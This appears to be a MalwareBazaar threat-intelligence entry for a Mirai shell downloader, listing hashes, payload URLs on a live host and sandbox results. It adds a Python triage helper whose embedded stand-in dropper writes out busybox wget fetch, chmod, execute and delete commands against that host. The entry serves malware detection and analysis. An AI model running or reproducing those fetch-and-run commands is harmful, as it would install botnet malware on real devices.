MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry

Signature: Mirai
Vendor detections: 6

SHA256 hash: 206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa
SHA3-384 hash: eae70751e0ca6492920db55acabdb3be062a90270d9c39641eb1a68cd0ba9c18144e1356cd4a495580494158f7c6921a
SHA1 hash: 1db7bf0dae2fa6643e840d7d71b7acfbc87ca830
MD5 hash: 2bce6b909e160b5a7bd97ff719c45c8c
humanhash: mississippi-nineteen-paris-vermont
File name: f
Signature: Mirai
File size: 831 bytes
First seen: 2025-12-21 15:13:54 UTC
Last seen: Never
File type: sh
MIME type: text/plain
ssdeep: 24:/iCZOi9k933v6gOTgO9k933v671k933v6gdgnk933v6XOSk933v67T79k933vXw:ZZTk92k9Wk9Ak9ok9Kk9Pw
TLSH: T13601ACCF10446D342DC845B93AD3541D58404AE236E4461DADDF857358C56187BBCE6C
Magika: txt
Reporter: abuse_ch
Tags: sh
Payloads fetched by this sample (one per target architecture; the SHA256 column is the MalwareBazaar entry for the fetched ELF):

URL | Malware sample (SHA256 hash) | Signature | Tags
http://130.12.180.64/jklmips | 67a7a0f8fc730923427afee83ea893b0f20779e37eeeaf88065ec1208bacefcc | Mirai | elf mirai ua-wget
http://130.12.180.64/jklmpsl | c3368dbe8c72d6b562974c6aa1c5a3642e0f47ebc4d79888824c8d71b5fcabfa | Mirai | elf mirai ua-wget
http://130.12.180.64/jklarm | 76cef13d393b6a2d6b81ce5ce644536b2d77edc858a36b5aa3c45645e90b47bb | Mirai | elf mirai
http://130.12.180.64/jklarm5 | f95187f0489f498c932ec698245e824170ca97d28405bf984fd89e9bb8488ff6 | Mirai | elf mirai ua-wget
http://130.12.180.64/jklarm7 | 64fcab57c878f909ecbefdb13bc62c66db16a4b0e858f723844a70019a913d6b | Mirai | elf mirai
http://130.12.180.64/jklarm6 | ac713128acaa4ac62947c969c4fbb1b6c0707c99c1cb81328256f832483768b3 | Mirai | elf mirai ua-wget

Intelligence


File Origin
# of uploads: 1
# of downloads: 38
Origin country: DE

Vendor Threat Intelligence
No detections

Verdict: Malicious
Threat level: 10/10
Confidence: 100%
Tags: busybox evasive mirai

Verdict: Malicious
File Type: text
First seen: 2025-12-21T12:37:00Z UTC
Last seen: 2025-12-22T10:29:00Z UTC
Hits: ~10
Status: terminated
Behavior Graph:
(process tree recovered from the sandbox graph; node GUIDs omitted)
  /usr/bin/sudo (pid 2755) --execve--> /tmp/sample.bin (pid 2762)
  /tmp/sample.bin --execve--> /usr/bin/cp (pid 2764)
  Six near-identical rounds follow, each consisting of:
    /tmp/sample.bin --clone--> /usr/bin/dash --execve--> /usr/bin/busybox [net, send-data, write-file] --> 130.12.180.64:80 (send: 83B; 82B in the third round)
    /tmp/sample.bin --execve--> /usr/bin/chmod
    /tmp/sample.bin --clone--> /usr/bin/dash
    /tmp/sample.bin --execve--> /usr/bin/rm [delete-file]
  Final step: /tmp/sample.bin --execve--> /usr/bin/rm [delete-file] (pid 2863)
  busybox processes that contacted 130.12.180.64:80: pids 2772, 2787, 2804, 2817, 2829, 2848 (six connections, matching the six URLs listed above)
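The URL table and the process tree above together describe the usual Mirai dropper loop: fetch one ELF per architecture with busybox wget, chmod it, run it, delete it, move on to the next. The Python below is an added triage helper, not code from MalwareBazaar or from the sample; the DROPPER text it parses is a constructed stand-in that reproduces that shape (the real 831-byte script is not reproduced on this page), and the architecture guess from the filename suffix is a heuristic assumption. It extracts the fetch URLs, checks that each one is followed by chmod, execution and rm, maps the URLs to the SHA256 values listed in the table, and flags the multi-round single-host pattern.

```python
"""Triage helper for Mirai-style shell downloaders (added example).

DROPPER is a constructed stand-in with the shape the sandbox graph shows
(busybox wget -> chmod -> run -> rm, once per architecture). It is NOT the
contents of sample 206182c1...; that file is not reproduced on the page.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional
from urllib.parse import urlparse

# Constructed stand-in, not the real sample.
DROPPER = r"""cd /tmp || cd /var/run || cd /mnt || cd /root || cd /
busybox wget http://130.12.180.64/jklmips; chmod 777 jklmips; ./jklmips; rm -rf jklmips
busybox wget http://130.12.180.64/jklmpsl; chmod 777 jklmpsl; ./jklmpsl; rm -rf jklmpsl
busybox wget http://130.12.180.64/jklarm; chmod 777 jklarm; ./jklarm; rm -rf jklarm
busybox wget http://130.12.180.64/jklarm5; chmod 777 jklarm5; ./jklarm5; rm -rf jklarm5
busybox wget http://130.12.180.64/jklarm7; chmod 777 jklarm7; ./jklarm7; rm -rf jklarm7
busybox wget http://130.12.180.64/jklarm6; chmod 777 jklarm6; ./jklarm6; rm -rf jklarm6
rm -rf /tmp/*
"""

# Payload hashes exactly as listed in the MalwareBazaar table for this sample.
KNOWN_PAYLOADS: Dict[str, str] = {
    "http://130.12.180.64/jklmips": "67a7a0f8fc730923427afee83ea893b0f20779e37eeeaf88065ec1208bacefcc",
    "http://130.12.180.64/jklmpsl": "c3368dbe8c72d6b562974c6aa1c5a3642e0f47ebc4d79888824c8d71b5fcabfa",
    "http://130.12.180.64/jklarm": "76cef13d393b6a2d6b81ce5ce644536b2d77edc858a36b5aa3c45645e90b47bb",
    "http://130.12.180.64/jklarm5": "f95187f0489f498c932ec698245e824170ca97d28405bf984fd89e9bb8488ff6",
    "http://130.12.180.64/jklarm7": "64fcab57c878f909ecbefdb13bc62c66db16a4b0e858f723844a70019a913d6b",
    "http://130.12.180.64/jklarm6": "ac713128acaa4ac62947c969c4fbb1b6c0707c99c1cb81328256f832483768b3",
}

URL_RE = re.compile(r"https?://[^\s;'\"|&]+")
FETCH_RE = re.compile(r"\b(?:busybox\s+)?(wget|curl|tftp|ftpget)\b")
# Heuristic (assumption): Mirai droppers usually end the filename with the target arch.
ARCH_RE = re.compile(r"(mips|mpsl|arm[4-7]?|x86|i[3-6]86|sh4|ppc|m68k|spc|sparc)$", re.I)


@dataclass
class Stage:
    url: str
    filename: str
    fetcher: str
    chmod: bool        # a later `chmod ... <file>` statement exists
    executed: bool     # a later `./<file>` statement exists
    removed: bool      # a later `rm ... <file>` statement exists
    sha256: Optional[str]  # from KNOWN_PAYLOADS, None if the URL is new


def split_statements(text: str) -> List[str]:
    """Break shell text into individual commands on newlines, ';', '&&', '||', '|'."""
    stmts = []
    for line in text.splitlines():
        for part in re.split(r";|&&|\|\||\|", line):
            part = part.strip()
            if part:
                stmts.append(part)
    return stmts


def guess_arch(filename: str) -> Optional[str]:
    m = ARCH_RE.search(filename)
    return m.group(1).lower() if m else None


def parse_dropper(text: str, known: Dict[str, str] = KNOWN_PAYLOADS) -> List[Stage]:
    """Return one Stage per fetch URL, with the follow-up actions seen after it."""
    stmts = split_statements(text)
    stages = []
    for i, stmt in enumerate(stmts):
        m = FETCH_RE.search(stmt)
        if not m:
            continue
        later = stmts[i + 1:]
        for url in URL_RE.findall(stmt):
            name = url.rstrip("/").rsplit("/", 1)[-1]
            stages.append(Stage(
                url=url, filename=name, fetcher=m.group(1),
                chmod=any(s.startswith("chmod") and name in s.split() for s in later),
                executed=any(re.fullmatch(rf"\./{re.escape(name)}(\s.*)?", s) for s in later),
                removed=any(s.startswith("rm") and name in s.split() for s in later),
                sha256=known.get(url),
            ))
    return stages


def is_mirai_style(stages: List[Stage], min_stages: int = 2) -> bool:
    """Heuristic: several complete fetch/chmod/exec/rm rounds against a single host."""
    full = [s for s in stages if s.chmod and s.executed and s.removed]
    hosts = {urlparse(s.url).netloc for s in full}
    return len(full) >= min_stages and len(hosts) == 1


def summarize(stages: List[Stage]) -> dict:
    return {
        "hosts": sorted({urlparse(s.url).netloc for s in stages}),
        "archs": [guess_arch(s.filename) for s in stages],
        "known": sum(1 for s in stages if s.sha256),
        "unknown": [s.url for s in stages if not s.sha256],
    }


if __name__ == "__main__":
    found = parse_dropper(DROPPER)
    for s in found:
        print(f"{s.url:36} arch={guess_arch(s.filename) or '?':5} "
              f"chmod={s.chmod} exec={s.executed} rm={s.removed} sha256={s.sha256}")
    print(summarize(found), "mirai_style:", is_mirai_style(found))
```

Running it against a real dropper pulled from a honeypot is the same call with the file contents in place of DROPPER; URLs that come back with sha256=None are the ones worth submitting, since they are payloads the table above does not yet cover.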
Threat name: Linux.Downloader.Generic
Status: Suspicious
First seen: 2025-12-21 15:33:23 UTC
File Type: Text (Shell)
AV detection: 10 of 24 (41.67%)
Threat level: 3/5

Result
Malware family: n/a
Score: 3/10
Tags: n/a
Behaviour
Modifies registry class
Suspicious use of SetWindowsHookEx
Enumerates physical storage devices
Note: these three behaviours are Windows sandbox signatures (registry, SetWindowsHookEx) and cannot describe a POSIX shell script; treat them as sandbox noise rather than observed behaviour of this sample.
Please note that we are no longer able to provide a coverage score for Virus Total.

File information


The table below shows additional information about this malware sample such as delivery method and external references.

Delivery method: Web download (distributed via web download)
Signature: Mirai
File type: sh
SHA256: 206182c1a774d08c201d4d46eeb9b54888a61f8611c722ef16ebd19e14d737aa (this sample)
